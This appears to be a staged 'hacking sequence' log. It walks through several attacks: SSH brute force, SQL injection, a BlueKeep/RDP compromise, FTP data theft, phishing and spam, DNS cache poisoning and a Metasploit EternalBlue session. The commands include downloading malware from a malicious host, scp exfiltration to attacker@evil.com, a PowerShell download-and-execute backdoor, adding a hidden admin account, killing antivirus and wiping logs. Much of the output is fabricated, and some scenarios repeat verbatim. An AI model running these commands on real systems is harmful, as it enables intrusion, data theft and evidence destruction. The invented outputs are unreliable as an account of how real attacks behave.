Initializing hacking sequence...
Scanning target IP: 192.168.1.1
Port 22 open - SSH detected
Attempting brute force on SSH...
Password cracked: admin123
Gaining shell access...
> whoami
root
> ls /var/www
index.html config.php
> cat /var/www/config.php
DB_HOST=localhost
DB_USER=admin
DB_PASS=secretpass
> mysql -u admin -p secretpass -e "SELECT * FROM users;"
id | username | password
1 | user1 | hashedpass1
2 | user2 | hashedpass2
> wget http://malicious.site/malware.sh
Downloading malware...
Executing payload...
Rootkit installed.
Covering tracks...
> rm -rf /var/log/*
Logs erased.
> echo "Hacked by Tr0jan" > /var/www/index.html
>>>>>>>>>>>> I crack your heart Aoimir <<<<<<<<<<<<
Site defaced.
Exfiltrating data...
> scp -r /var/www/* attacker@evil.com:/data
Transfer complete.
Disconnecting...
Session ended.
Initializing hacking sequence...
Scanning target IP: 10.0.0.1
Port 80 open - HTTP detected
Exploiting SQL injection...
Payload: ' OR 1=1 --
Database dumped.
> nmap -sV -p- target.com
Starting Nmap...
Port 443 open - HTTPS
Port 3389 open - RDP
Attempting RDP exploit...
BlueKeep vulnerability found.
Exploiting...
Remote desktop access granted.
> dir C:\Users
Administrator
Guest
User
> type C:\Users\User\Desktop\secrets.txt
Bank account: 123456789
Password: qwerty
> net user hacker password /add
User added.
> net localgroup administrators hacker /add
Admin privileges granted.
Installing backdoor...
> powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/backdoor.ps1')"
Backdoor active.
Covering tracks...
> wevtutil cl System
Event logs cleared.
> shutdown /r /t 0
Rebooting target...
Hack complete.
Initializing hacking sequence...
Scanning target IP: 172.16.0.1
Port 21 open - FTP detected
Anonymous login successful
> ftp> ls
226 Transfer complete.
> ftp> get sensitive_data.zip
226 Transfer complete.
Unzipping...
> unzip sensitive_data.zip
Archive: sensitive_data.zip
extracting: passwords.txt
extracting: credit_cards.csv
> cat passwords.txt
admin:password1
user:password2
> head -10 credit_cards.csv
4111111111111111,John Doe,12/25
4222222222222222,Jane Smith,01/26
> rm sensitive_data.zip
Evidence removed.
Initializing hacking sequence...
Scanning target IP: 203.0.113.1
Port 25 open - SMTP detected
Spoofing email...
From: boss@company.com
To: employee@company.com
Subject: Urgent: Update Credentials
Body: Click here to update: http://phishing.site
Email sent.
Phishing campaign initiated.
Monitoring responses...
Credentials harvested: 5
> hydra -l admin -P rockyou.txt smtp.company.com smtp
Hydra starting...
[25][smtp] host: smtp.company.com login: admin password: letmein
1 of 1 target successfully completed, 1 valid password found
Access gained.
> telnet smtp.company.com 25
Trying 203.0.113.1...
Connected to smtp.company.com.
Escape character is '^]'.
220 smtp.company.com ESMTP Postfix
> HELO evil.com
250 smtp.company.com
> MAIL FROM:
250 2.1.0 Ok
> RCPT TO:
250 2.1.5 Ok
> DATA
354 End data with .
Subject: You've won a prize!
Click here: http://malware.link
.
250 2.0.0 Ok: queued as 12345
> QUIT
221 2.0.0 Bye
Spam sent.
Initializing hacking sequence...
Scanning target IP: 198.51.100.1
Port 53 open - DNS detected
Poisoning DNS cache...
Redirecting bank.com to fakebank.com
> dig @198.51.100.1 bank.com
;; ANSWER SECTION:
bank.com. 3600 IN A 203.0.113.195
Cache poisoned.
Victims redirected to phishing site.
> metasploit
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set RHOSTS 198.51.100.1
RHOSTS => 198.51.100.1
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 198.51.100.1:445 - Connecting to target for exploitation.
[+] 198.51.100.1:445 - Connection established for exploitation.
[+] 198.51.100.1:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[*] 198.51.100.1:445 - Core module executing cmd.exe...
[*] 198.51.100.1:445 - Reading from connection #1...
[+] 198.51.100.1:445 - ===============================
[+] 198.51.100.1:445 - ETERNALBLUE OVERFLOW
[+] 198.51.100.1:445 - ===============================
[*] 198.51.100.1:445 - Sending stage (179779 bytes) to 198.51.100.1
[*] 198.51.100.1:445 - Meterpreter session 1 opened (192.168.1.100:4444 -> 198.51.100.1:49229) at 2023-01-01 00:00:00 +0000
meterpreter > sysinfo
Computer : WIN7PRO
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > shell
Process 1234 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> dir
Volume in drive C has no label.
Volume Serial Number is 1234-5678
Directory of C:\Windows\system32
01/01/2023 00:00 .
01/01/2023 00:00 ..
01/01/2023 00:00 1,234 config.sys
> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 123
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 456
> taskkill /f /im antivirus.exe
SUCCESS: The process "antivirus.exe" with PID 789 has been terminated.
> echo "Hacked by Tr0jan" > C:\Users\Public\Desktop\message.txt
File created.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 198.51.100.1 - Meterpreter session 1 closed.
Hack complete.
Initializing hacking sequence...
Scanning target IP: 192.168.1.1
Port 22 open - SSH detected
Attempting brute force on SSH...
Password cracked: admin123
Gaining shell access...
> whoami
root
> ls /var/www
index.html config.php
> cat /var/www/config.php
DB_HOST=localhost
DB_USER=admin
DB_PASS=secretpass
> mysql -u admin -p secretpass -e "SELECT * FROM users;"
id | username | password
1 | user1 | hashedpass1
2 | user2 | hashedpass2
> wget http://malicious.site/malware.sh
Downloading malware...
Executing payload...
Rootkit installed.
Covering tracks...
> rm -rf /var/log/*
Logs erased.
> echo "Hacked by Tr0jan" > /var/www/index.html
Site defaced.
Exfiltrating data...
> scp -r /var/www/* attacker@evil.com:/data
Transfer complete.
Disconnecting...
Session ended.
Initializing hacking sequence...
Scanning target IP: 10.0.0.1
Port 80 open - HTTP detected
Exploiting SQL injection...
Payload: ' OR 1=1 --
Database dumped.
> nmap -sV -p- target.com
Starting Nmap...
Port 443 open - HTTPS
Port 3389 open - RDP
Attempting RDP exploit...
BlueKeep vulnerability found.
Exploiting...
Remote desktop access granted.
> dir C:\Users
Administrator
Guest
User
> type C:\Users\User\Desktop\secrets.txt
Bank account: 123456789
Password: qwerty
> net user hacker password /add
User added.
> net localgroup administrators hacker /add
Admin privileges granted.
Installing backdoor...
> powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/backdoor.ps1')"
Backdoor active.
Covering tracks...
> wevtutil cl System
Event logs cleared.
> shutdown /r /t 0
Rebooting target...
Hack complete.